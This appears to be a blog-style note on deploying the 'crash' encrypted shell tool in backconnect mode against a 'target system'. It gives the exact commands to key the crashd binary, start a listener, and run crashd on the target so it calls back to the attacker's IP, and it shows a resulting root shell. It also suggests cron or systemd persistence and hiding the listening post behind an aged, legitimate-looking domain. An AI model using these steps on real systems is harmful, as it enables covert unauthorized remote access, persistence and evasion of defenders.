Using Crash in backconnect mode with self-extraction.
So you have built 'crashd' statically, as per a previous post.
You have ensured no OPSEC breaking strings are present. You have made your keys. You have your listening post server set up (we will discuss more advanced LP setups later).
You have read the manual, but maybe you are a bit confused about making it work in a reverse shell mode with self extraction. I certainly was. Because I am bad at reading.
Your first step, is to key your crashd binary. Shove those server keys into the crashd binary with cat, and ship it over to your target system. The order matters here.
cat serverkey.priv>>crashd
cat serverkey.pub>>crashd
cat authkey.pub>>crashd
You will want to set up your listener now. In this example, we are not verifying server keys, so be aware of that. The file "HK_127.0.0.1" can be put in the "-K" argument, I just forgot to copy it to my LP at the time. Don't be me, don't make that error.
./crashc -v -K none -i authkey.priv -p 6969 -l root
You should see this prompt. Enter your PEM pass phrase at the prompt, whack 'enter', and wait.
$ ./crashc -v -K none -i authkey.priv -p 6969 -l root
crypted admin shell (C) 2022 Sebastian Krahmer https://github.com/stealth/crash
crashc: starting crypted administration shell
crashc: connecting to :6969 ...
Enter PEM pass phrase:
Copy your crashd binary to the target system, and invoke it like so:
./crashd -A self -a -e -U -H YOUR-LISTEN-IP -p 6969
You should see something like the following on your listener once the shell lands.
crashc: Different versions. Some features might not work.
crashc: Cipher: TLS_AES_256_GCM_SHA384 TLSv1.3 Kx=any Au=any Enc=AESGCM(256) Mac=AEAD
crashc: Hostkey checking disabled!
# id;uname -a;pwd
uid=0(root) gid=0(root) groups=0(root)
Linux debian 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64 GNU/Linux
/root
# exit
crashc: closing connection.
That is it. You have your shell. Have a play with the port forwarding and SOCKS proxy options for tunnelling through the target.
crashd when invoked in this mode does not daemonize and reconnect (it only forks to background), so if you close the shell, you need to re-exec it on target. A nice to have would be for it to try connect back every X amount of time.
You can always add it to cron, or use a systemd timer or similar to bring your own persistence. I've been threatening to write a series of notes trying to exhaustively document every place you can persist on Linux for a while now, so I will have to get around to doing that.
crash apparently supports SNI proxying, using something like sshttpd, which I think could be a very neat way to hide your LP behind a legitimate looking website with a well categorised, aged domain.
I am just unclear as yet how to make this work in reverse-connecting mode, so I'll have to look into that soon and see if I can document it.